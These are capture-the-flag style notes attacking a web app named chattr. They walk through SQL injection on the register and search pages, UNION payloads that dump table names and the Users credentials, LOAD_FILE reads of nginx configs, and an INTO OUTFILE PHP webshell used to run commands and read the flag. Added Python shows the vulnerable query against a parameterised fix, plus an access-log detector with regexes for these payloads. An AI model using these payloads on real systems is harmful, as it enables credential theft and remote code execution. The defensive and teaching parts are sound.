# Initial Enum

- Ping test ![[images/Pasted image 20251205192427.png]]
- Nmap scan ![[images/Pasted image 20251205192434.png]]
- Visit page in browser ![[images/Pasted image 20251205192507.png]]
- Random content
- Getting interesting error message in address bar ![[images/Pasted image 20251205192541.png]]
- admin:admin doesn't work
- admin:sqli strings don't work
- try register page ![[images/Pasted image 20251205194059.png]]
- send test to repeater tab ![[images/Pasted image 20251205194136.png]]
- add single quote escape > 500 error ![[images/Pasted image 20251205194202.png]]
- try appending `'or '1'='1` > 302 code ![[images/Pasted image 20251205194323.png]]
- try appending `') OR 1=1-- —` > 302 code with successful account creation

# Determine password hash for `admin`

- login with new test account ![[images/Pasted image 20251205194944.png]]
- try search feature ![[images/Pasted image 20251205195015.png]]
- send to repeater tab and add single quote escape to search string > 500 error ![[images/Pasted image 20251205195125.png]]
- append `') -- -` to search string > 200 OK ![[images/Pasted image 20251205195256.png]]
- we have SQL injection
- determine number of columns for UNION payloads
- 200 OK on 4 columns ![[images/Pasted image 20251205195703.png]]
- columns 3 and 4 are reflected in the convo pane > these are the injection points ![[images/Pasted image 20251205195958.png]]
- insert `@@version` for 3 ![[images/Pasted image 20251205200023.png]]
- insert `database()` for 4 ![[images/Pasted image 20251205200109.png]]
- list tables with the following UNION payload: `index.php?q=abc%27)+UNION+select+1,2,TABLE_NAME,TABLE_SCHEMA+from+INFORMATION_SCHEMA.TABLES+where+table_schema=%27chattr%27--+-&u=1` ![[images/Pasted image 20251205200958.png]]
- enumerate columns with the following UNION payload: `index.php?q=abc%27)%20UNION%20SELECT%201,2,COLUMN_NAME,TABLE_NAME%20from%20INFORMATION_SCHEMA.COLUMNS%20where%20table_name=%27Users%27--%20-&u=1` ![[images/Pasted image 20251205201112.png]]
- grab username:password from the chattr.Users table with the following UNION payload: `index.php?q=abc%27)%20UNION%20SELECT%201,2,username,password%20from%20chattr.Users--%20-&u=1` ![[images/Pasted image 20251205201230.png]]

# Determine webroot

- nginx webroot is set by the config file in `/etc/nginx/nginx.conf`
- usually in one of two places
  - `/usr/share/nginx/www`
  - `/usr/share/nginx/html`
- read `/etc/nginx/nginx.conf` with the following UNION payload `index.php?q=abc%27)%20UNION%20SELECT%201,%202,LOAD_FILE("/etc/nginx/nginx.conf"),%204--%20-&u=1`, based on `cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -` ![[images/Pasted image 20251205202008.png]]
- read `/etc/nginx/sites-enabled/default` with a similar UNION payload to the one above ![[images/Pasted image 20251205202305.png]]
- webroot is shown as ![[images/Pasted image 20251205202338.png]]

# Achieve RCE for flag

- try for RCE using the following UNION payload
  ```mysql
  ') union select "",:"",'<?php system($_REQUEST["cmd"]); ?>',"" into outfile '/var/www/chattr-prod/shell.php'-- -
  ```
- no errors ![[images/Pasted image 20251205202638.png]]
- visit shell.php > 404 error ![[images/Pasted image 20251205202904.png]]
- retry with the following revised UNION payload
  ```mysql
  ') union select 1,2,'<?php system($_REQUEST["cmd"]); ?>',4 into outfile '/var/www/chattr-prod/shell.php'-- -
  ```
- no errors ![[images/Pasted image 20251205203130.png]]
- visit `shell.php?cmd=id` > success! ![[images/Pasted image 20251205203157.png]]
- grab flag
  - first `cmd=ls /` ![[images/Pasted image 20251205203343.png]]
  - second `cat /flag_876a4c.txt` ![[images/Pasted image 20251205203423.png]]
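The probes in the "Determine password hash" section (a bare quote gives a 500, `') -- -` gives a 200, a four-column UNION lines up) imply a search query that concatenates the user string inside a parenthesised clause. The following Python is an added example, not code from the original notes or from the chattr application: it reconstructs that query shape against a constructed in-memory SQLite database, reproduces the observed status codes, and shows the parameterised form that the same payload cannot break out of. The table layout, column names and hash values are all assumptions.

```python
import sqlite3

# Constructed stand-in for the chattr database (not the real target schema):
# a Users table like the one enumerated in the notes and a Messages table the
# search endpoint is assumed to query. All values are made up.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO Users VALUES (1, 'admin', 'CONSTRUCTED_HASH_admin'),
                                 (2, 'test',  'CONSTRUCTED_HASH_test');
        CREATE TABLE Messages (id INTEGER, sender TEXT, body TEXT, ts TEXT);
        INSERT INTO Messages VALUES (1, 'admin', 'hello world', '2025-12-05');
    """)
    return conn


def search_vulnerable(conn: sqlite3.Connection, q: str) -> list:
    """Hypothetical reconstruction of the broken search: the user string is
    concatenated inside a parenthesised LIKE clause with four selected columns.
    That shape is what the probes imply: a bare quote breaks the syntax (500),
    "') -- -" closes the clause cleanly (200), and a four-column UNION matches
    the original SELECT."""
    sql = f"SELECT id, sender, body, ts FROM Messages WHERE (body LIKE '%{q}%')"
    return conn.execute(sql).fetchall()


def search_safe(conn: sqlite3.Connection, q: str) -> list:
    """Hardened form: the same query with the value bound as a parameter, so
    quotes, parentheses and comment markers are matched as literal text."""
    sql = "SELECT id, sender, body, ts FROM Messages WHERE (body LIKE '%' || ? || '%')"
    return conn.execute(sql, (q,)).fetchall()


def status_for(search, conn: sqlite3.Connection, q: str) -> int:
    """Map the outcome to the status code the notes observed: a SQL error
    surfaces as a 500, anything that parses returns 200."""
    try:
        search(conn, q)
        return 200
    except sqlite3.Error:
        return 500


# The credential-dump payload from the notes, minus the "chattr." schema
# prefix, which the in-memory stand-in does not have.
UNION_PAYLOAD = "abc') UNION SELECT 1,2,username,password FROM Users-- -"

if __name__ == "__main__":
    db = make_db()
    print("probe abc'       :", status_for(search_vulnerable, db, "abc'"), "(vulnerable)",
          status_for(search_safe, db, "abc'"), "(safe)")
    print("vulnerable union :", search_vulnerable(db, UNION_PAYLOAD))
    print("safe union       :", search_safe(db, UNION_PAYLOAD))
```

With the concatenated query the UNION payload returns the Users rows in the message columns, exactly the reflection seen in the convo pane; with the bound parameter the same string is just a search term that matches nothing, and the bare quote no longer produces a server error either.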
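Every step from the table enumeration through the `LOAD_FILE` reads and the `INTO OUTFILE` write went over GET query strings, so the whole chain is visible in the nginx access log once the URL encoding is stripped. As an added example that is not part of the original notes, the following Python scans constructed access-log lines modelled on the requests in this walkthrough and tags the indicators a defender would alert on; the log lines, addresses, timestamps and tag names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed nginx access-log lines (combined format) modelled on the requests
# in the walkthrough. Addresses, timestamps and sizes are made up. The
# register-page injection travelled in a POST body, which an access log does
# not record, so the second line is indistinguishable from a normal sign-up.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [05/Dec/2025:19:40:15 +0000] "GET /index.php?q=hello&u=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [05/Dec/2025:19:43:23 +0000] "POST /register.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [05/Dec/2025:20:09:58 +0000] "GET /index.php?q=abc%27)+UNION+select+1,2,TABLE_NAME,TABLE_SCHEMA+from+INFORMATION_SCHEMA.TABLES+where+table_schema=%27chattr%27--+-&u=1 HTTP/1.1" 200 1400 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [05/Dec/2025:20:12:30 +0000] "GET /index.php?q=abc%27)%20UNION%20SELECT%201,2,username,password%20from%20chattr.Users--%20-&u=1 HTTP/1.1" 200 734 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [05/Dec/2025:20:20:08 +0000] "GET /index.php?q=abc%27)%20UNION%20SELECT%201,%202,LOAD_FILE(%22/etc/nginx/nginx.conf%22),%204--%20-&u=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [05/Dec/2025:20:31:57 +0000] "GET /shell.php?cmd=id HTTP/1.1" 200 61 "-" "curl/8.0"',
]

# Minimal combined-format parser: client IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Each indicator is matched against the decoded, lower-cased, whitespace-folded
# request path. The dict keys are the tags emitted in alerts.
INDICATORS = {
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema-enum": re.compile(r"\binformation_schema\.(tables|columns)\b"),
    "file-read": re.compile(r"\bload_file\s*\("),
    "file-write": re.compile(r"\binto\s+(out|dump)file\b"),
    "fingerprint": re.compile(r"@@version|\bdatabase\s*\(\s*\)"),
    "tautology": re.compile(r"'\s*\)?\s*or\s+'?1'?\s*=\s*'?1"),
    "command-param": re.compile(r"\.php\?(.*&)?cmd="),
}


def normalise(path: str) -> str:
    """Decode twice so one layer of double-encoding cannot hide a keyword, then
    fold case and whitespace so "UNION%20%20SELECT" and "union+select" match alike."""
    decoded = unquote_plus(unquote_plus(path))
    return re.sub(r"\s+", " ", decoded).lower()


def classify(path: str) -> list:
    """Return the indicator tags that fire on one request path, in dict order."""
    text = normalise(path)
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def scan_access_log(lines) -> list:
    """Parse each line and emit an alert record for every request that trips
    at least one indicator. Lines that do not parse are skipped."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m["path"])
        if tags:
            alerts.append({
                "ip": m["ip"],
                "status": int(m["status"]),
                "path": normalise(m["path"]),
                "tags": tags,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_ACCESS_LOG):
        print(alert["ip"], alert["status"], alert["tags"], alert["path"])
```

Two things worth noting from the defender's side. The webshell write only worked because the database account held the `FILE` privilege, `secure_file_priv` was not restricting where MySQL may read and write, and the web root was writable by the database process; tightening any one of those stops the `LOAD_FILE` and `INTO OUTFILE` steps even when the injection itself remains. And because the register-page injection was a POST, catching that first step needs request-body logging or an application-side log, not the access log alone.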